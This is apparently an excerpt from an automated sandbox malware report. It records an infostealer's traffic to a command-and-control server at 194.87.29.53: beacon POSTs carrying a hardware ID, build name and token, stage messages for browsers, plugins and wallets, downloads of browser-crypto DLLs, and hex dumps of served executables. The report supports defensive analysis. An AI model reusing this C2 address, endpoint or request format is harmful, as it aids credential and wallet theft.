00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 16:29:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 16:29:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 16:29:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.87.29.53Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6f9307efa625dd18.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFBFCBGHDGCFHJJECAFHost: 194.87.29.53Content-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 38 35 46 44 37 34 34 41 41 42 36 39 31 36 31 30 39 31 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6f 6c 65 68 5f 70 73 70 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 2d 2d 0d 0a Data Ascii: ------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="hwid"1C85FD744AAB69161091------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="build"oleh_psp------BAFBFCBGHDGCFHJJECAF--
Source: global traffic HTTP traffic detected: POST /6f9307efa625dd18.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGDBAFHJJDAKEBGCFCBHost: 194.87.29.53Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 44 42 41 46 48 4a 4a 44 41 4b 45 42 47 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 38 30 32 39 61 32 62 31 61 62 31 30 37 32 62 39 34 66 64 30 37 61 34 35 38 36 66 34 38 38 36 38 38 63 37 31 38 32 63 34 63 35 30 32 66 36 38 39 30 37 32 64 39 33 38 65 32 36 37 64 31 65 37 31 65 66 61 32 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 44 42 41 46 48 4a 4a 44 41 4b 45 42 47 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 44 42 41 46 48 4a 4a 44 41 4b 45 42 47 43 46 43 42 2d 2d 0d 0a Data Ascii: ------AEGDBAFHJJDAKEBGCFCBContent-Disposition: form-data; name="token"a8029a2b1ab1072b94fd07a4586f488688c7182c4c502f689072d938e267d1e71efa285a------AEGDBAFHJJDAKEBGCFCBContent-Disposition: form-data; name="message"browsers------AEGDBAFHJJDAKEBGCFCB--
Source: global traffic HTTP traffic detected: POST /6f9307efa625dd18.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHCGCGCFHIDBFHIIJKJHost: 194.87.29.53Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 43 47 43 47 43 46 48 49 44 42 46 48 49 49 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 38 30 32 39 61 32 62 31 61 62 31 30 37 32 62 39 34 66 64 30 37 61 34 35 38 36 66 34 38 38 36 38 38 63 37 31 38 32 63 34 63 35 30 32 66 36 38 39 30 37 32 64 39 33 38 65 32 36 37 64 31 65 37 31 65 66 61 32 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 43 47 43 47 43 46 48 49 44 42 46 48 49 49 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 43 47 43 47 43 46 48 49 44 42 46 48 49 49 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------KEHCGCGCFHIDBFHIIJKJContent-Disposition: form-data; name="token"a8029a2b1ab1072b94fd07a4586f488688c7182c4c502f689072d938e267d1e71efa285a------KEHCGCGCFHIDBFHIIJKJContent-Disposition: form-data; name="message"plugins------KEHCGCGCFHIDBFHIIJKJ--
Source: global traffic HTTP traffic detected: POST /6f9307efa625dd18.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFIEHCFIECBGCBFHIJHost: 194.87.29.53Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 38 30 32 39 61 32 62 31 61 62 31 30 37 32 62 39 34 66 64 30 37 61 34 35 38 36 66 34 38 38 36 38 38 63 37 31 38 32 63 34 63 35 30 32 66 36 38 39 30 37 32 64 39 33 38 65 32 36 37 64 31 65 37 31 65 66 61 32 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 2d 2d 0d 0a Data Ascii: ------KFCFIEHCFIECBGCBFHIJContent-Disposition: form-data; name="token"a8029a2b1ab1072b94fd07a4586f488688c7182c4c502f689072d938e267d1e71efa285a------KFCFIEHCFIECBGCBFHIJContent-Disposition: form-data; name="message"fplugins------KFCFIEHCFIECBGCBFHIJ--
Source: global traffic HTTP traffic detected: POST /6f9307efa625dd18.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKECBFCGIEGCBGCAECGCHost: 194.87.29.53Content-Length: 6327Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /97f9710b31d15029/sqlite3.dll HTTP/1.1Host: 194.87.29.53Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6f9307efa625dd18.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJEHost: 194.87.29.53Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6f9307efa625dd18.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKJKJJJECFIEBFHIEGHost: 194.87.29.53Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6f9307efa625dd18.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJHost: 194.87.29.53Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 38 30 32 39 61 32 62 31 61 62 31 30 37 32 62 39 34 66 64 30 37 61 34 35 38 36 66 34 38 38 36 38 38 63 37 31 38 32 63 34 63 35 30 32 66 36 38 39 30 37 32 64 39 33 38 65 32 36 37 64 31 65 37 31 65 66 61 32 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 2d 2d 0d 0a Data Ascii: ------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="token"a8029a2b1ab1072b94fd07a4586f488688c7182c4c502f689072d938e267d1e71efa285a------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="file"------IJKFHDBKFCAAECBFIDHJ--
Source: global traffic HTTP traffic detected: POST /6f9307efa625dd18.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHDAKFIJJKKEBGDBAAKHost: 194.87.29.53Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 44 41 4b 46 49 4a 4a 4b 4b 45 42 47 44 42 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 38 30 32 39 61 32 62 31 61 62 31 30 37 32 62 39 34 66 64 30 37 61 34 35 38 36 66 34 38 38 36 38 38 63 37 31 38 32 63 34 63 35 30 32 66 36 38 39 30 37 32 64 39 33 38 65 32 36 37 64 31 65 37 31 65 66 61 32 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 44 41 4b 46 49 4a 4a 4b 4b 45 42 47 44 42 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 44 41 4b 46 49 4a 4a 4b 4b 45 42 47 44 42 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 44 41 4b 46 49 4a 4a 4b 4b 45 42 47 44 42 41 41 4b 2d 2d 0d 0a Data Ascii: ------AEHDAKFIJJKKEBGDBAAKContent-Disposition: form-data; name="token"a8029a2b1ab1072b94fd07a4586f488688c7182c4c502f689072d938e267d1e71efa285a------AEHDAKFIJJKKEBGDBAAKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AEHDAKFIJJKKEBGDBAAKContent-Disposition: form-data; name="file"------AEHDAKFIJJKKEBGDBAAK--
Source: global traffic HTTP traffic detected: GET /97f9710b31d15029/freebl3.dll HTTP/1.1Host: 194.87.29.53Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /97f9710b31d15029/mozglue.dll HTTP/1.1Host: 194.87.29.53Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /97f9710b31d15029/msvcp140.dll HTTP/1.1Host: 194.87.29.53Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /97f9710b31d15029/nss3.dll HTTP/1.1Host: 194.87.29.53Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /97f9710b31d15029/softokn3.dll HTTP/1.1Host: 194.87.29.53Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /97f9710b31d15029/vcruntime140.dll HTTP/1.1Host: 194.87.29.53Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6f9307efa625dd18.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIJJEGDBFIIDGCAKJEBHost: 194.87.29.53Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6f9307efa625dd18.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJHost: 194.87.29.53Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 38 30 32 39 61 32 62 31 61 62 31 30 37 32 62 39 34 66 64 30 37 61 34 35 38 36 66 34 38 38 36 38 38 63 37 31 38 32 63 34 63 35 30 32 66 36 38 39 30 37 32 64 39 33 38 65 32 36 37 64 31 65 37 31 65 66 61 32 38 35 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="token"a8029a2b1ab1072b94fd07a4586f488688c7182c4c502f689072d938e267d1e71efa285a------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="message"wallets------DGHDHIDGHIDGIECBKKJJ--
